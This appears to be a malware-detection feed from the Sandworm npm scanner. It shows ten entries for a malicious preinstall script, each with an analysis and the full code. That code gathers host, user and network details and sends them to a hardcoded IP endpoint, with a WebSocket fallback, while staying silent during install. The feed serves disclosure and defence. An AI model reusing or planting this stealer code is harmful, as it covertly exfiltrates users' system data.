Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our π / Twitter feed for updates.
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This code collects sensitive system information, including the public IP address, local IP address, username, and other OS details, then sends this information to remote servers without user consent. The use of both HTTP and WebSocket for data transmission increases the risk of interception and exploitation, making it a potential tool for data exfiltration and unauthorized access.
Install script:
node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information such as public IP, local IP, hostname, OS details, and the username, and sends this data to a remote server via HTTP GET and POST requests. It also has a WebSocket fallback for data transmission, making it persistent in data exfiltration attempts. This behavior poses a serious threat to user privacy and security, as it can lead to unauthorized access and manipulation of sensitive information.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information, including the user's local and public IP addresses, hostname, operating system information, and current user details. It then sends this data to external servers via HTTP and WebSocket methods without the user's consent, which poses a serious privacy risk. This information could be exploited by malicious actors, and the use of hardcoded endpoints raises significant concerns about data integrity and security.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This code collects sensitive system information, including the public IP address, hostname, operating system details, current directory, and the username. It then sends this data to remote servers using both HTTP GET and POST requests, as well as via WebSocket if those fail. This behavior is highly dangerous as it can expose users' private information without their consent and could be used for malicious purposes such as identity theft or unauthorized access.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information, including the public IP address, local IP address, hostname, OS type, and user information, then sends this data to a remote server. The use of dynamic import and multiple endpoints makes it behave like malware, as it can easily be modified to send data to other malicious servers or execute harmful actions without the user's consent.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information, including the public IP address and user info, and then sends that data to remote servers without user consent. The presence of hardcoded endpoints and a WebSocket backup mechanism poses a significant risk, as it can be used to exfiltrate sensitive user data, potentially compromising user privacy and security.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information such as public and local IP addresses, hostname, OS type, and user information, and sends this data to remote servers without user consent. This can lead to privacy violations and potential exploitation by attackers since the data includes personal and system details. Additionally, the use of hardcoded endpoints makes it clear that the data is sent to potentially malicious servers.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The script collects sensitive system information, including the local and public IP addresses, the hostname, OS type, and user info, sending this data to remote servers. This behavior poses significant privacy risks, as it may exfiltrate user data without consent and could be used maliciously to track or exploit vulnerable systems.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information, including the public and local IP addresses, hostname, OS type, and username, and sends this data to remote servers without user consent. This could lead to privacy violations and potential security risks, as attackers could exploit this information. Additionally, the inclusion of WebSocket communication for sending this data further increases the risk of interception and abuse.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
Detected: 16 Mar 2025
Detected Date: 16 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code collects sensitive system information (including public IP, local IP, hostname, OS type, and user info) and sends it to predefined endpoints over HTTP and WebSocket. This poses a significant security risk as it could lead to unauthorized access or data breaches by exfiltrating personal and system information without user consent.
Install script:node index.jsconst os = require("os");
const https = require("https");
// Check if running during `npm install`
const isPreinstall = process.env.npm_lifecycle_event === "preinstall";
// Dynamically import node-fetch
async function getFetch() {
return (await import("node-fetch")).default;
}
// Collect System Information
const systemInfo = {
publicIP: "", // Will be fetched dynamically
hostname: os.hostname(),
osType: os.type(),
osPlatform: os.platform(),
osRelease: os.release(),
osArch: os.arch(),
localIP: Object.values(os.networkInterfaces())
.flat()
.find((i) => i.family === "IPv4" && !i.internal)?.address || "Unknown",
whoamiUser: os.userInfo().username,
currentDirectory: process.cwd(),
};
// Fetch public IP dynamically
https.get("https://api64.ipify.org?format=json", (res) => {
let data = "";
res.on("data", (chunk) => (data += chunk));
res.on("end", () => {
try {
systemInfo.publicIP = JSON.parse(data).ip;
} catch (e) {
systemInfo.publicIP = "Unknown";
}
sendData(systemInfo);
});
}).on("error", () => sendData(systemInfo));
// List of fallback servers
const endpoints = [
"http://18.234.109.231:8080/jpd3.php",
"http://18.234.109.231:8080/jpd4.php",
];
// Get random available endpoint
function getAvailableEndpoint() {
return endpoints[Math.floor(Math.random() * endpoints.length)];
}
// Convert system info to query string
function buildQueryParams(data) {
return Object.entries(data)
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
.join("&");
}
// Send Data (GET and POST)
async function sendData(data) {
try {
const fetch = await getFetch();
// Construct GET request URL
const getUrl = `${getAvailableEndpoint()}?${buildQueryParams(data)}`;
// Send GET request
const getResponse = await fetch(getUrl, { method: "GET" });
// Send POST request
const postResponse = await fetch(getAvailableEndpoint(), {
method: "POST",
headers: {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
},
body: JSON.stringify(data),
});
// Only log responses if NOT running in `npm install`
if (!isPreinstall) {
console.log("GET Response:", await getResponse.text());
console.log("POST Response:", await postResponse.text());
}
} catch (error) {
if (!isPreinstall) {
console.error("Error sending data via HTTP:", error);
}
sendViaWebSocket(data);
}
}
// WebSocket Backup (if HTTP requests fail)
async function sendViaWebSocket(data) {
try {
const { WebSocket } = await import("ws"); // Import ws dynamically
const ws = new WebSocket("wss://yourserver.com/socket");
ws.on("open", () => {
if (!isPreinstall) {
console.log("WebSocket connection established.");
}
ws.send(JSON.stringify(data));
ws.close();
});
ws.on("error", (err) => {
if (!isPreinstall) {
console.error("WebSocket Error:", err);
}
});
} catch (error) {
if (!isPreinstall) {
console.error("WebSocket module import failed:", error);
}
}
}
